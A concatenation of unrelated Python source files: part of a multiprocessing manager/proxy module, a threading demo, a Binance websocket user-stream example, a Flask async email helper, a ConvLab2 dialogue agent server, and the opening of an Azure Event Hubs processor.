def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind == '#TRACEBACK':
assert type(result) is str
return RemoteError(result)
elif kind == '#UNSERIALIZABLE':
assert type(result) is str
return RemoteError('Unserializable message: %s\n' % result)
else:
return ValueError('Unrecognized message type')
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
assert isinstance(authkey, bytes)
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.mutex = threading.RLock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__:
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
obj, exposed, gettypeid = id_to_obj[ident]
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception as e:
send(('#UNSERIALIZABLE', repr(msg)))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
with self.mutex:
result = []
keys = list(self.id_to_obj.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
return len(self.id_to_obj) - 1 # don't count ident='0'
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
assert len(args) == 1 and not kwds
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
assert type(method_to_typeid) is dict
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
# increment the reference count immediately, to avoid
# this object being garbage collected before a Proxy
# object for it can be created. The caller of create()
# is responsible for doing a decref once the Proxy object
# has been created.
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
self.id_to_refcount[ident] += 1
def decref(self, c, ident):
with self.mutex:
assert self.id_to_refcount[ident] >= 1
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_obj[ident], self.id_to_refcount[ident]
util.debug('disposing of obj with id %r', ident)
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
assert self._state.value == State.INITIAL
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
assert self._state.value == State.INITIAL
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
assert self._state.value == State.STARTED
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
address = property(lambda self: self._address)
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()):
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referrent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if context.get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
If possible the shared object is returned, or otherwise a proxy for it.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
return server.id_to_obj[token.id][0]
else:
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return an proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self):
return self._callmethod('notify')
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = _time() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - _time()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
|
multithread.py
|
import threading
import time
def long_time_task(i):
print('Current sub_thread: {} Task {}'.format(threading.current_thread().name, i))
time.sleep(2)
print("Result: {}".format(8 ** 20))
if __name__=='__main__':
start = time.time()
print('This is main thread:{}'.format(threading.current_thread().name))
thread_list = []
for i in range(1, 3):
t = threading.Thread(target=long_time_task, args=(i, ))
thread_list.append(t)
for t in thread_list:
t.start()
for t in thread_list:
t.join()
end = time.time()
print("Totally used {} seconds".format((end - start)))
|
example_userdata_stream_new_style.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_userdata_stream_new_style.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
# configure api key and secret for binance.com
api_key = ""
api_secret = ""
# create instances of BinanceWebSocketApiManager
ubwa_com = BinanceWebSocketApiManager(exchange="binance.com")
# create the userData streams
user_stream_id = ubwa_com.create_stream('arr', '!userData', api_key=api_key, api_secret=api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com,))
worker_thread.start()
# configure api key and secret for binance.com Isolated Margin
api_key = ""
api_secret = ""
# create instances of BinanceWebSocketApiManager
ubwa_com_im = BinanceWebSocketApiManager(exchange="binance.com-isolated_margin")
# create the userData streams
user_stream_id_im = ubwa_com_im.create_stream('arr', '!userData', symbols="trxbtc", api_key=api_key, api_secret=api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com_im,))
worker_thread.start()
# monitor the streams
while True:
ubwa_com.print_stream_info(user_stream_id)
ubwa_com_im.print_stream_info(user_stream_id_im)
time.sleep(1)
|
email.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 29 15:35:50 2020
@author: rohithbhandaru
"""
from threading import Thread
from flask import current_app
from flask_mail import Message
from . import mail
def send_async_email(appContext, msg):
with appContext.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
app = current_app._get_current_object()
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
|
run_agent.py
|
import sys
import os
import numpy as np
import copy
from flask import Flask, request, jsonify
from queue import PriorityQueue
from threading import Thread
# Agent
from convlab2.dialog_agent import PipelineAgent, BiSession
from convlab2.nlu.milu.multiwoz import MILU
from convlab2.dst.rule.multiwoz import RuleDST
from convlab2.policy.rule.multiwoz import RulePolicy
from convlab2.nlg.template.multiwoz import TemplateNLG
from convlab2.evaluator.multiwoz_eval import MultiWozEvaluator
import random
import numpy as np
from pprint import pprint
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
sys_nlu = MILU()
sys_dst = RuleDST()
sys_policy = RulePolicy(character='sys')
sys_nlg = TemplateNLG(is_user=False)
agent = PipelineAgent(sys_nlu,sys_dst,sys_policy, sys_nlg,'sys')
print(agent.response('I am looking for a hotel'))
@app.route('/', methods=['GET', 'POST'])
def process():
try:
in_request = request.json
print(in_request)
except:
return "invalid input: {}".format(in_request)
rgi_queue.put(in_request)
rgi_queue.join()
output = rgo_queue.get()
print(output['response'])
rgo_queue.task_done()
# return jsonify({'response': response})
return jsonify(output)
def generate_response(in_queue, out_queue):
while True:
# pop input
last_action = 'null'
in_request = in_queue.get()
obs = in_request['input']
if in_request['agent_state'] == {}:
agent.init_session()
else:
encoded_state, dst_state, last_action = in_request['agent_state']
agent.dst.state = copy.deepcopy(dst_state)
try:
action = agent.response(obs)
print(f'obs:{obs}; action:{action}')
dst_state = copy.deepcopy(agent.dst.state)
encoded_state = None
except Exception as e:
print('agent error', e)
try:
if action == '':
response = 'Sorry I do not understand, can you paraphrase?'
else:
response = action
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
last_action = action
out_queue.put({'response': response, 'agent_state': (encoded_state, dst_state, last_action)})
in_queue.task_done()
out_queue.join()
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
worker.setDaemon(True)
worker.start()
app.run(host='0.0.0.0', port=10004)
|
event_processor.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import uuid
import logging
import time
import threading
from typing import Dict, Callable, List, Any, Union, TYPE_CHECKING, Optional, Iterable, cast
from functools import partial
from .partition_context import PartitionContext
from .ownership_manager import OwnershipManager
from .common import CloseReason
from. _eventprocessor_mixin import EventProcessorMixin
if TYPE_CHECKING:
from datetime import datetime
from .checkpoint_store import CheckpointStore
from .._common import EventData
from .._consumer import EventHubConsumer
from .._consumer_client import EventHubConsumerClient
_LOGGER = logging.getLogger(__name__)
class EventProcessor(EventProcessorMixin): # pylint:disable=too-many-instance-attributes
"""
An EventProcessor constantly receives events from one or multiple partitions of the Event Hub
in the context of a given consumer group.
"""
def __init__(
self,
eventhub_client, # type: EventHubConsumerClient
consumer_group, # type: str
on_event, # type: Callable[[PartitionContext, EventData], None]
**kwargs # type: Any
):
# type: (...) -> None
# pylint: disable=line-too-long
self._consumer_group = consumer_group
self._eventhub_client = eventhub_client
self._namespace = eventhub_client._address.hostname # pylint: disable=protected-access
self._eventhub_name = eventhub_client.eventhub_name
self._event_handler = on_event
